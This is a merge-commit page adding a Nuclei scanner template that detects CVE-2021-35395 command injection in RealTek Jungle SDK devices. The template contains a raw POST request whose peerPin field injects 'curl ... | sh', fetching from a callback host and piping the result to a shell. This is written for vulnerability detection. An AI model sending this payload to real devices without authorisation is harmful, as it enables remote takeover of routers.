Merge pull request #8321 from king-alexander/template/CVE-2021-35395

CVE-2021-35395
projectdiscovery · Nov 14, 2023 · 651fab9 · 651fab9
2 parents 3bde7ad + ed66572
commit 651fab9
Showing 1 changed file with 36 additions and 0 deletions.
diff --git a/http/cves/2021/CVE-2021-35395.yaml b/http/cves/2021/CVE-2021-35395.yaml
@@ -0,0 +1,36 @@
+id: CVE-2021-35395
+
+info:
+  name: RealTek Jungle SDK - Arbitrary Command Injection
+  author: king-alexander
+  severity: critical
+  remediation: Apply the latest security patches or updates provided by RealTek to fix the vulnerability.
+  description: |
+    There is a command injection vulnerability on the "formWsc" page of the management interface. Successful exploitation of this vulnerability could lead to remote code execution and compromise of the affected system.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-35395
+    - https://blogs.juniper.net/en-us/threat-research/attacks-continue-against-realtek-vulnerabilities
+  metadata:
+    max-request: 1
+  tags: cve,cve2021,realtek,rce,kev
+
+http:
+  - raw:
+      - |
+        POST /goform/formWsc HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;curl http://{{interactsh-url}} | sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin=
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+
+      - type: word
+        part: interactsh_request
+        words:
+          - "User-Agent: curl"